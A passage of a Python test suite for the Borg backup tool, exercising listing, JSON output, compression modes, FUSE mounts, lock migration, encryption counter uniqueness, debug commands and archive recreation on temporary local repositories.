    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test1', src_dir)
    # these are not really checkpoints, but they look like some:
    self.cmd('create', self.repository_location + '::test2.checkpoint', src_dir)
    self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
    output = self.cmd('list', self.repository_location)
    assert "test1" in output
    assert "test2.checkpoint" not in output
    assert "test3.checkpoint.1" not in output
    output = self.cmd('list', '--consider-checkpoints', self.repository_location)
    assert "test1" in output
    assert "test2.checkpoint" in output
    assert "test3.checkpoint.1" in output
def test_list_chunk_counts(self):
    """test the {num_chunks} and {unique_chunks} list format keys"""
    self.create_regular_file('empty_file', size=0)
    self.create_regular_file('two_chunks')
    # two distinct 8 MB runs, so the file chunks into (at least) two unique chunks
    with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
        fd.write(b'abba' * 2000000)
        fd.write(b'baab' * 2000000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    test_archive = self.repository_location + '::test'
    self.cmd('create', test_archive, 'input')
    output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
    assert "0 0 input/empty_file" in output
    assert "2 2 input/two_chunks" in output
def test_list_size(self):
    """test the size/csize/dsize/dcsize list format keys for a compressible file"""
    self.create_regular_file('compressible_file', size=10000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    test_archive = self.repository_location + '::test'
    self.cmd('create', '-C', 'lz4', test_archive, 'input')
    output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
    size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
    # compressed sizes must be smaller, deduplicated sizes must not exceed the plain ones
    assert int(csize) < int(size)
    assert int(dcsize) < int(dsize)
    assert int(dsize) <= int(size)
    assert int(dcsize) <= int(csize)
def test_list_json(self):
    """test 'list --json' (repo level) and 'list --json-lines' (archive level) output"""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
    repository = list_repo['repository']
    assert len(repository['id']) == 64  # hex-encoded repo id
    assert datetime.strptime(repository['last_modified'], ISO_FORMAT)  # must not raise
    assert list_repo['encryption']['mode'] == 'repokey'
    assert 'keyfile' not in list_repo['encryption']  # no key file for repokey mode
    archive0 = list_repo['archives'][0]
    assert datetime.strptime(archive0['time'], ISO_FORMAT)  # must not raise
    list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
    items = [json.loads(s) for s in list_archive.splitlines()]
    assert len(items) == 2  # the 'input' dir and file1
    file1 = items[1]
    assert file1['path'] == 'input/file1'
    assert file1['size'] == 81920
    assert datetime.strptime(file1['mtime'], ISO_FORMAT)  # must not raise
    # --format keys must be merged into the json-lines output:
    list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
    items = [json.loads(s) for s in list_archive.splitlines()]
    assert len(items) == 2
    file1 = items[1]
    assert file1['path'] == 'input/file1'
    assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
    """test that --json-lines on a repo and --json on an archive are rejected (exit code 2)"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
    self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
def test_log_json(self):
    """test that --log-json emits parseable json-lines with file_status and log_message records"""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
    messages = {}  # type -> message, one of each kind
    for line in log.splitlines():
        msg = json.loads(line)
        messages[msg['type']] = msg
    file_status = messages['file_status']
    assert 'status' in file_status
    assert file_status['path'].startswith('input')
    log_message = messages['log_message']
    assert isinstance(log_message['time'], float)
    assert log_message['levelname'] == 'DEBUG'  # there should only be DEBUG messages
    assert isinstance(log_message['message'], str)
def test_debug_profile(self):
    """test --debug-profile output in both formats: borg's own (needs convert-profile)
    and native pyprof (loadable by pstats directly)"""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
    self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
    stats = pstats.Stats('create.pyprof')
    stats.strip_dirs()
    stats.sort_stats('cumtime')
    # a .pyprof target makes borg write the native format directly:
    self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
    stats = pstats.Stats('create.pyprof')  # Only do this on trusted data!
    stats.strip_dirs()
    stats.sort_stats('cumtime')
def test_common_options(self):
    """test that common options (here: --debug) are accepted before the subcommand"""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
    assert 'security: read previous location' in log
def _get_sizes(self, compression, compressible, size=10000):
    """Back up a single file using *compression* and return its (size, csize).

    *compressible* selects the file's payload: a repeated byte (compresses
    well) or random bytes (does not compress).
    """
    payload = b'X' * size if compressible else os.urandom(size)
    self.create_regular_file('file', contents=payload)
    self.cmd('init', '--encryption=none', self.repository_location)
    archive = self.repository_location + '::test'
    self.cmd('create', '-C', compression, archive, 'input')
    listing = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
    fields = listing.split("\n")[1].split(" ")
    return int(fields[0]), int(fields[1])
def test_compression_none_compressible(self):
    """'none' stores compressible data as-is, plus a small constant overhead"""
    size, csize = self._get_sizes('none', compressible=True)
    assert csize == size + 3
def test_compression_none_uncompressible(self):
    """'none' stores uncompressible data as-is, plus a small constant overhead"""
    size, csize = self._get_sizes('none', compressible=False)
    assert csize == size + 3
def test_compression_zlib_compressible(self):
    """'zlib' shrinks highly compressible data to a known small size"""
    size, csize = self._get_sizes('zlib', compressible=True)
    assert csize < size * 0.1
    assert csize == 35
def test_compression_zlib_uncompressible(self):
    """'zlib' cannot shrink random data; stored size may even grow slightly"""
    size, csize = self._get_sizes('zlib', compressible=False)
    assert csize >= size
def test_compression_auto_compressible(self):
    """'auto,zlib' compresses compressible data exactly like plain 'zlib'"""
    size, csize = self._get_sizes('auto,zlib', compressible=True)
    assert csize < size * 0.1
    assert csize == 35  # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
    """'auto,zlib' falls back to uncompressed storage for uncompressible data"""
    size, csize = self._get_sizes('auto,zlib', compressible=False)
    assert csize == size + 3  # same as compression 'none'
def test_compression_lz4_compressible(self):
    """'lz4' shrinks highly compressible data substantially"""
    size, csize = self._get_sizes('lz4', compressible=True)
    assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
    """'lz4' stores uncompressible data uncompressed"""
    size, csize = self._get_sizes('lz4', compressible=False)
    assert csize == size + 3  # same as compression 'none'
def test_compression_lzma_compressible(self):
    """'lzma' shrinks highly compressible data substantially"""
    size, csize = self._get_sizes('lzma', compressible=True)
    assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
    """'lzma' stores uncompressible data uncompressed"""
    size, csize = self._get_sizes('lzma', compressible=False)
    assert csize == size + 3  # same as compression 'none'
def test_compression_zstd_compressible(self):
    """'zstd' shrinks highly compressible data substantially"""
    size, csize = self._get_sizes('zstd', compressible=True)
    assert csize < size * 0.1
def test_compression_zstd_uncompressible(self):
    """'zstd' stores uncompressible data uncompressed"""
    size, csize = self._get_sizes('zstd', compressible=False)
    assert csize == size + 3  # same as compression 'none'
def test_change_passphrase(self):
    """test 'key change-passphrase' via BORG_NEW_PASSPHRASE and access with the new one"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
    # here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
    self.cmd('key', 'change-passphrase', self.repository_location)
    os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
    self.cmd('list', self.repository_location)  # must succeed with the new passphrase
def test_break_lock(self):
    """test that 'break-lock' runs successfully on an unlocked repository"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('break-lock', self.repository_location)
def test_usage(self):
    """test that invoking borg without arguments and with -h does not fail"""
    self.cmd()
    self.cmd('-h')
def test_help(self):
    """test the 'help' command, including --epilog-only / --usage-only filtering"""
    assert 'Borg' in self.cmd('help')
    assert 'patterns' in self.cmd('help', 'patterns')
    assert 'Initialize' in self.cmd('help', 'init')
    assert 'positional arguments' not in self.cmd('help', 'init', '--epilog-only')
    assert 'This command initializes' not in self.cmd('help', 'init', '--usage-only')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse(self):
    """test FUSE mounts of a whole repository and of a single archive and verify
    that metadata (stat, hardlinks, symlinks, FIFOs, xattrs) and content match the input"""
    def has_noatime(some_file):
        # detect whether opening with O_NOATIME actually works here
        # (needs platform support and sufficient permissions)
        atime_before = os.stat(some_file).st_atime_ns
        try:
            os.close(os.open(some_file, flags_noatime))
        except PermissionError:
            return False
        else:
            atime_after = os.stat(some_file).st_atime_ns
            noatime_used = flags_noatime != flags_normal
            return noatime_used and atime_before == atime_after
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_test_files()
    have_noatime = has_noatime('input/file1')
    self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive', 'input')
    self.cmd('create', '--exclude-nodump', '--atime', self.repository_location + '::archive2', 'input')
    if has_lchflags:
        # remove the file we did not backup, so input and output become equal
        os.remove(os.path.join('input', 'flagfile'))
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    # mount the whole repository, archive contents shall show up in archivename subdirs of mountpoint:
    with self.fuse_mount(self.repository_location, mountpoint):
        # flags are not supported by the FUSE mount
        # we also ignore xattrs here, they are tested separately
        self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive', 'input'),
                               ignore_flags=True, ignore_xattrs=True)
        self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'archive2', 'input'),
                               ignore_flags=True, ignore_xattrs=True)
    # mount only 1 archive, its contents shall show up directly in mountpoint:
    with self.fuse_mount(self.repository_location + '::archive', mountpoint):
        self.assert_dirs_equal(self.input_path, os.path.join(mountpoint, 'input'),
                               ignore_flags=True, ignore_xattrs=True)
        # regular file
        in_fn = 'input/file1'
        out_fn = os.path.join(mountpoint, 'input', 'file1')
        # stat: all metadata must match between input and mounted file
        sti1 = os.stat(in_fn)
        sto1 = os.stat(out_fn)
        assert sti1.st_mode == sto1.st_mode
        assert sti1.st_uid == sto1.st_uid
        assert sti1.st_gid == sto1.st_gid
        assert sti1.st_size == sto1.st_size
        if have_noatime:
            assert sti1.st_atime == sto1.st_atime
        assert sti1.st_ctime == sto1.st_ctime
        assert sti1.st_mtime == sto1.st_mtime
        if are_hardlinks_supported():
            # note: there is another hardlink to this, see below
            assert sti1.st_nlink == sto1.st_nlink == 2
        # read
        with open(in_fn, 'rb') as in_f, open(out_fn, 'rb') as out_f:
            assert in_f.read() == out_f.read()
        # hardlink (to 'input/file1')
        if are_hardlinks_supported():
            in_fn = 'input/hardlink'
            out_fn = os.path.join(mountpoint, 'input', 'hardlink')
            sti2 = os.stat(in_fn)
            sto2 = os.stat(out_fn)
            assert sti2.st_nlink == sto2.st_nlink == 2
            assert sto1.st_ino == sto2.st_ino  # same inode in the mount -> hardlink preserved
        # symlink
        if are_symlinks_supported():
            in_fn = 'input/link1'
            out_fn = os.path.join(mountpoint, 'input', 'link1')
            sti = os.stat(in_fn, follow_symlinks=False)
            sto = os.stat(out_fn, follow_symlinks=False)
            assert sti.st_size == len('somewhere')
            assert sto.st_size == len('somewhere')
            assert stat.S_ISLNK(sti.st_mode)
            assert stat.S_ISLNK(sto.st_mode)
            assert os.readlink(in_fn) == os.readlink(out_fn)
        # FIFO
        if are_fifos_supported():
            out_fn = os.path.join(mountpoint, 'input', 'fifo1')
            sto = os.stat(out_fn)
            assert stat.S_ISFIFO(sto.st_mode)
        # list/read xattrs
        try:
            in_fn = 'input/fusexattr'
            out_fn = os.fsencode(os.path.join(mountpoint, 'input', 'fusexattr'))
            if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
                assert sorted(no_selinux(xattr.listxattr(out_fn))) == [b'user.empty', b'user.foo', ]
                assert xattr.getxattr(out_fn, b'user.foo') == b'bar'
                assert xattr.getxattr(out_fn, b'user.empty') == b''
            else:
                assert no_selinux(xattr.listxattr(out_fn)) == []
                try:
                    xattr.getxattr(out_fn, b'user.foo')
                except OSError as e:
                    assert e.errno == llfuse.ENOATTR
                else:
                    assert False, "expected OSError(ENOATTR), but no error was raised"
        except OSError as err:
            if sys.platform.startswith(('nothing_here_now', )) and err.errno == errno.ENOTSUP:
                # some systems have no xattr support on FUSE
                pass
            else:
                raise
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_versions_view(self):
    """test the FUSE 'versions' view: each input file appears as a directory
    containing one version per archive; hardlink identity must be preserved.

    Fix: the original used bare ``open(...).read()`` without closing, leaking
    file descriptors; on a FUSE mount open fds can also prevent a clean unmount.
    """
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('test', contents=b'first')
    if are_hardlinks_supported():
        self.create_regular_file('hardlink1', contents=b'123456')
        os.link('input/hardlink1', 'input/hardlink2')
        os.link('input/hardlink1', 'input/hardlink3')
    self.cmd('create', self.repository_location + '::archive1', 'input')
    self.create_regular_file('test', contents=b'second')
    self.cmd('create', self.repository_location + '::archive2', 'input')
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    # mount the whole repository, archive contents shall show up in versioned view:
    with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions'):
        path = os.path.join(mountpoint, 'input', 'test')  # filename shows up as directory ...
        files = os.listdir(path)
        assert all(f.startswith('test.') for f in files)  # ... with files test.xxxxx in there
        contents = set()
        for f in files:
            with open(os.path.join(path, f), 'rb') as fd:  # close fds, do not leak them
                contents.add(fd.read())
        assert {b'first', b'second'} == contents
        if are_hardlinks_supported():
            hl1 = os.path.join(mountpoint, 'input', 'hardlink1', 'hardlink1.00001')
            hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
            hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
            assert os.stat(hl1).st_ino == os.stat(hl2).st_ino == os.stat(hl3).st_ino
            with open(hl3, 'rb') as fd:
                assert fd.read() == b'123456'
    # similar again, but exclude the hardlink master:
    with self.fuse_mount(self.repository_location, mountpoint, '-o', 'versions', '-e', 'input/hardlink1'):
        if are_hardlinks_supported():
            hl2 = os.path.join(mountpoint, 'input', 'hardlink2', 'hardlink2.00001')
            hl3 = os.path.join(mountpoint, 'input', 'hardlink3', 'hardlink3.00001')
            assert os.stat(hl2).st_ino == os.stat(hl3).st_ino
            with open(hl3, 'rb') as fd:
                assert fd.read() == b'123456'
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_allow_damaged_files(self):
    """test that a damaged (chunk-missing) file raises EIO through FUSE by default,
    but is readable when mounted with -o allow_damaged_files"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_src_archive('archive')
    # Get rid of a chunk and repair it
    archive, repository = self.open_archive('archive')
    with repository:
        for item in archive.iter_items():
            if item.path.endswith('testsuite/archiver.py'):
                repository.delete(item.chunks[-1].id)
                path = item.path  # store full path for later
                break
        else:
            assert False  # missed the file
        repository.commit(compact=False)
    self.cmd('check', '--repair', self.repository_location, exit_code=0)
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    with self.fuse_mount(self.repository_location + '::archive', mountpoint):
        # default: opening the damaged file must fail with EIO
        with pytest.raises(OSError) as excinfo:
            open(os.path.join(mountpoint, path))
        assert excinfo.value.errno == errno.EIO
    with self.fuse_mount(self.repository_location + '::archive', mountpoint, '-o', 'allow_damaged_files'):
        # with allow_damaged_files, opening must succeed
        open(os.path.join(mountpoint, path)).close()
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_options(self):
    """test archive-selection options (--first/--last/--sort/--prefix) on FUSE mounts"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_src_archive('arch11')
    self.create_src_archive('arch12')
    self.create_src_archive('arch21')
    self.create_src_archive('arch22')
    mountpoint = os.path.join(self.tmpdir, 'mountpoint')
    with self.fuse_mount(self.repository_location, mountpoint, '--first=2', '--sort=name'):
        assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
    with self.fuse_mount(self.repository_location, mountpoint, '--last=2', '--sort=name'):
        assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
    with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch1'):
        assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12']
    with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch2'):
        assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch21', 'arch22']
    with self.fuse_mount(self.repository_location, mountpoint, '--prefix=arch'):
        assert sorted(os.listdir(os.path.join(mountpoint))) == ['arch11', 'arch12', 'arch21', 'arch22']
    with self.fuse_mount(self.repository_location, mountpoint, '--prefix=nope'):
        # non-matching prefix -> empty mountpoint
        assert sorted(os.listdir(os.path.join(mountpoint))) == []
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_migrate_lock_alive(self):
    """Both old_id and new_id must not be stale during lock migration / daemonization."""
    from functools import wraps
    import pickle
    import traceback

    # Check results are communicated from the borg mount background process
    # to the pytest process by means of a serialized dict object stored in this file.
    assert_data_file = os.path.join(self.tmpdir, 'migrate_lock_assert_data.pickle')

    # Decorates Lock.migrate_lock() with process_alive() checks before and after.
    # (We don't want to mix testing code into runtime.)
    def write_assert_data(migrate_lock):
        @wraps(migrate_lock)
        def wrapper(self, old_id, new_id):
            wrapper.num_calls += 1
            assert_data = {
                'num_calls': wrapper.num_calls,
                'old_id': old_id,
                'new_id': new_id,
                'before': {
                    'old_id_alive': platform.process_alive(*old_id),
                    'new_id_alive': platform.process_alive(*new_id)},
                'exception': None,
                'exception.extr_tb': None,
                'after': {
                    'old_id_alive': None,
                    'new_id_alive': None}}
            try:
                with open(assert_data_file, 'wb') as _out:
                    pickle.dump(assert_data, _out)
            except Exception:
                # best effort: result reporting must never break the daemonized
                # process (was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit)
                pass
            try:
                return migrate_lock(self, old_id, new_id)
            except BaseException as e:
                # capture the exception for the parent instead of raising here
                assert_data['exception'] = e
                assert_data['exception.extr_tb'] = traceback.extract_tb(e.__traceback__)
            finally:
                assert_data['after'].update({
                    'old_id_alive': platform.process_alive(*old_id),
                    'new_id_alive': platform.process_alive(*new_id)})
                try:
                    with open(assert_data_file, 'wb') as _out:
                        pickle.dump(assert_data, _out)
                except Exception:
                    pass
        wrapper.num_calls = 0
        return wrapper

    # Decorate
    borg.locking.Lock.migrate_lock = write_assert_data(borg.locking.Lock.migrate_lock)
    try:
        self.cmd('init', '--encryption=none', self.repository_location)
        self.create_src_archive('arch')
        mountpoint = os.path.join(self.tmpdir, 'mountpoint')
        # In order that the decoration is kept for the borg mount process, we must not spawn, but actually fork;
        # not to be confused with the forking in borg.helpers.daemonize() which is done as well.
        with self.fuse_mount(self.repository_location, mountpoint, os_fork=True):
            pass
        with open(assert_data_file, 'rb') as _in:
            assert_data = pickle.load(_in)
        print('\nLock.migrate_lock(): assert_data = %r.' % (assert_data, ), file=sys.stderr, flush=True)
        exception = assert_data['exception']
        if exception is not None:
            extracted_tb = assert_data['exception.extr_tb']
            print(
                'Lock.migrate_lock() raised an exception:\n',
                'Traceback (most recent call last):\n',
                *traceback.format_list(extracted_tb),
                *traceback.format_exception(exception.__class__, exception, None),
                sep='', end='', file=sys.stderr, flush=True)
        assert assert_data['num_calls'] == 1, "Lock.migrate_lock() must be called exactly once."
        assert exception is None, "Lock.migrate_lock() may not raise an exception."
        assert_data_before = assert_data['before']
        assert assert_data_before['old_id_alive'], "old_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
        assert assert_data_before['new_id_alive'], "new_id must be alive (=must not be stale) when calling Lock.migrate_lock()."
        assert_data_after = assert_data['after']
        assert assert_data_after['old_id_alive'], "old_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
        assert assert_data_after['new_id_alive'], "new_id must be alive (=must not be stale) when Lock.migrate_lock() has returned."
    finally:
        # Undecorate
        borg.locking.Lock.migrate_lock = borg.locking.Lock.migrate_lock.__wrapped__
def verify_aes_counter_uniqueness(self, method):
    """Verify no AES-CTR counter value is ever reused across repo operations.

    ``method`` is the encryption mode passed to ``borg init``.
    """
    seen = set()  # Chunks already seen
    used = set()  # counter values already used

    def verify_uniqueness():
        with Repository(self.repository_path) as repository:
            for id, _ in repository.open_index(repository.get_transaction_id()).iteritems():
                data = repository.get(id)
                hash = sha256(data).digest()
                if hash not in seen:
                    seen.add(hash)
                    # assumes a 41-byte object header with the 8-byte CTR nonce
                    # at bytes 33..41 -- TODO confirm against the key format
                    num_blocks = num_cipher_blocks(len(data) - 41)
                    nonce = bytes_to_long(data[33:41])
                    for counter in range(nonce, nonce + num_blocks):
                        self.assert_not_in(counter, used)
                        used.add(counter)

    self.create_test_files()
    os.environ['BORG_PASSPHRASE'] = 'passphrase'
    self.cmd('init', '--encryption=' + method, self.repository_location)
    verify_uniqueness()
    self.cmd('create', self.repository_location + '::test', 'input')
    verify_uniqueness()
    self.cmd('create', self.repository_location + '::test.2', 'input')
    verify_uniqueness()
    self.cmd('delete', self.repository_location + '::test.2')
    verify_uniqueness()
def test_aes_counter_uniqueness_keyfile(self):
    """CTR values must be unique with keyfile encryption."""
    self.verify_aes_counter_uniqueness('keyfile')
def test_aes_counter_uniqueness_passphrase(self):
    """CTR values must be unique with repokey encryption."""
    self.verify_aes_counter_uniqueness('repokey')
def test_debug_dump_archive_items(self):
    """'debug dump-archive-items' must write one numbered file per item and report success."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        output = self.cmd('debug', 'dump-archive-items', self.repository_location + '::test')
    produced = sorted(os.listdir('output'))
    # item dumps are named 000000_..., 000001_..., ...
    assert len(produced) > 0 and produced[0].startswith('000000_')
    assert 'Done.' in output
def test_debug_dump_repo_objs(self):
    """'debug dump-repo-objs' must write one numbered file per repo object and report success."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        output = self.cmd('debug', 'dump-repo-objs', self.repository_location)
    produced = sorted(os.listdir('output'))
    # object dumps are named 00000000_..., 00000001_..., ...
    assert len(produced) > 0 and produced[0].startswith('00000000_')
    assert 'Done.' in output
def test_debug_put_get_delete_obj(self):
    """Round-trip an object through debug put-obj / get-obj / delete-obj."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    payload = b'some data'
    hexkey = sha256(payload).hexdigest()
    self.create_regular_file('file', contents=payload)
    # put: reports the id of the stored object
    assert hexkey in self.cmd('debug', 'put-obj', self.repository_location, 'input/file')
    # get: retrieves the object back into a file
    assert hexkey in self.cmd('debug', 'get-obj', self.repository_location, hexkey, 'output/file')
    with open('output/file', 'rb') as f:
        assert f.read() == payload
    # delete: first succeeds, second finds nothing, bad id is rejected
    assert 'deleted' in self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
    assert 'not found' in self.cmd('debug', 'delete-obj', self.repository_location, hexkey)
    assert 'is invalid' in self.cmd('debug', 'delete-obj', self.repository_location, 'invalid')
def test_init_interrupt(self):
    """An EOF during key creation must abort init and leave no repository behind."""
    def abort_with_eof(*args):
        raise EOFError

    with patch.object(KeyfileKeyBase, 'create', abort_with_eof):
        self.cmd('init', '--encryption=repokey', self.repository_location, exit_code=1)
    assert not os.path.exists(self.repository_location)
def test_init_requires_encryption_option(self):
    """init without --encryption must fail with a usage error (rc 2)."""
    self.cmd('init', self.repository_location, exit_code=2)
def test_init_nested_repositories(self):
    """Creating a repository inside an existing one must be refused."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    nested = self.repository_location + '/nested'
    if self.FORK_DEFAULT:
        # forked borg reports the error via exit code 2
        self.cmd('init', '--encryption=repokey', nested, exit_code=2)
    else:
        # in-process borg raises the exception directly
        with pytest.raises(Repository.AlreadyExists):
            self.cmd('init', '--encryption=repokey', nested)
def check_cache(self):
    """Run 'borg check', then verify the on-disk chunks cache matches a cache
    rebuilt from the repository (AssertionError on any mismatch)."""
    # First run a regular borg check
    self.cmd('check', self.repository_location)
    # Then check that the cache on disk matches exactly what's in the repo.
    with self.open_repository() as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        with Cache(repository, key, manifest, sync=False) as cache:
            # sync=False: take the cache as it is on disk, do not resync first
            original_chunks = cache.chunks
        # wipe the cache and let it be rebuilt from the repository
        Cache.destroy(repository)
        with Cache(repository, key, manifest) as cache:
            correct_chunks = cache.chunks
    assert original_chunks is not correct_chunks
    seen = set()
    # every rebuilt entry must match the original cache entry exactly
    for id, (refcount, size, csize) in correct_chunks.iteritems():
        o_refcount, o_size, o_csize = original_chunks[id]
        assert refcount == o_refcount
        assert size == o_size
        assert csize == o_csize
        seen.add(id)
    # and the original cache must not contain extra entries
    for id, (refcount, size, csize) in original_chunks.iteritems():
        assert id in seen
def test_check_cache(self):
    """check_cache() must detect a chunks cache whose refcounts diverge from the repo."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with self.open_repository() as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        with Cache(repository, key, manifest, sync=False) as cache:
            cache.begin_txn()
            # corrupt the cache: bump the refcount of an arbitrary chunk
            some_chunk_id = list(cache.chunks.iteritems())[0][0]
            cache.chunks.incref(some_chunk_id)
            cache.commit()
    with pytest.raises(AssertionError):
        self.check_cache()
def test_recreate_target_rc(self):
    """recreate --target on a whole repository (not a single archive) must fail with rc 2."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    output = self.cmd('recreate', self.repository_location, '--target=asdf', exit_code=2)
    assert 'Need to specify single archive' in output
def test_recreate_target(self):
    """recreate --target must write a new archive and keep the original untouched."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.check_cache()
    original = self.repository_location + '::test0'
    self.cmd('create', original, 'input')
    self.check_cache()
    archives_before = self.cmd('list', self.repository_location)
    self.cmd('recreate', original, 'input/dir2', '-e', 'input/dir2/file3', '--target=new-archive')
    self.check_cache()
    archives = self.cmd('list', self.repository_location)
    # the source archive survives and the target appears alongside it
    assert archives_before in archives
    assert 'new-archive' in archives
    listing = self.cmd('list', '--short', self.repository_location + '::new-archive')
    # only the selected subtree minus the exclusion made it into the target
    assert 'file1' not in listing
    assert 'dir2/file2' in listing
    assert 'dir2/file3' not in listing
def test_recreate_basic(self):
    """In-place recreate must narrow an archive to the given paths minus exclusions."""
    self.create_test_files()
    self.create_regular_file('dir2/file3', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    target = self.repository_location + '::test0'
    self.cmd('create', target, 'input')
    self.cmd('recreate', target, 'input/dir2', '-e', 'input/dir2/file3')
    self.check_cache()
    listing = self.cmd('list', '--short', target)
    # outside-the-subtree and excluded files are gone; the rest remains
    assert 'file1' not in listing
    assert 'dir2/file2' in listing
    assert 'dir2/file3' not in listing
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_subtree_hardlinks(self):
    """Recreating a subtree must keep hardlink groups intact within that subtree."""
    # This is essentially the same problem set as in test_extract_hardlinks
    self._extract_hardlinks_setup()
    self.cmd('create', self.repository_location + '::test2', 'input')
    # narrow 'test' down to input/dir1; 'test2' keeps the full input tree
    self.cmd('recreate', self.repository_location + '::test', 'input/dir1')
    self.check_cache()
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
        # within the recreated subtree each hardlink pair still has 2 links
        assert os.stat('input/dir1/hardlink').st_nlink == 2
        assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
        assert os.stat('input/dir1/aaaa').st_nlink == 2
        assert os.stat('input/dir1/source2').st_nlink == 2
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test2')
        # the untouched archive still links all four names together
        assert os.stat('input/dir1/hardlink').st_nlink == 4
def test_recreate_rechunkify(self):
    """Recreating with new chunker params must rechunk so archives deduplicate again."""
    with open(os.path.join(self.input_path, 'large_file'), 'wb') as fd:
        fd.write(b'a' * 280)
        fd.write(b'b' * 280)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # test1 uses tiny custom chunker params, test2 uses the defaults
    self.cmd('create', '--chunker-params', '7,9,8,128', self.repository_location + '::test1', 'input')
    self.cmd('create', self.repository_location + '::test2', 'input', '--files-cache=disabled')
    # renamed from 'list', which shadowed the builtin
    chunk_info = self.cmd('list', self.repository_location + '::test1', 'input/large_file',
                          '--format', '{num_chunks} {unique_chunks}')
    num_chunks, unique_chunks = map(int, chunk_info.split(' '))
    # test1 and test2 do not deduplicate
    assert num_chunks == unique_chunks
    self.cmd('recreate', self.repository_location, '--chunker-params', 'default')
    self.check_cache()
    # test1 and test2 do deduplicate after recreate
    assert int(self.cmd('list', self.repository_location + '::test1', 'input/large_file', '--format={size}'))
    assert not int(self.cmd('list', self.repository_location + '::test1', 'input/large_file',
                            '--format', '{unique_chunks}'))
def test_recreate_recompress(self):
    """--recompress must shrink stored size while file content stays identical."""
    self.create_regular_file('compressible', size=10000)
    self.cmd('init', '--encryption=repokey', self.repository_location)
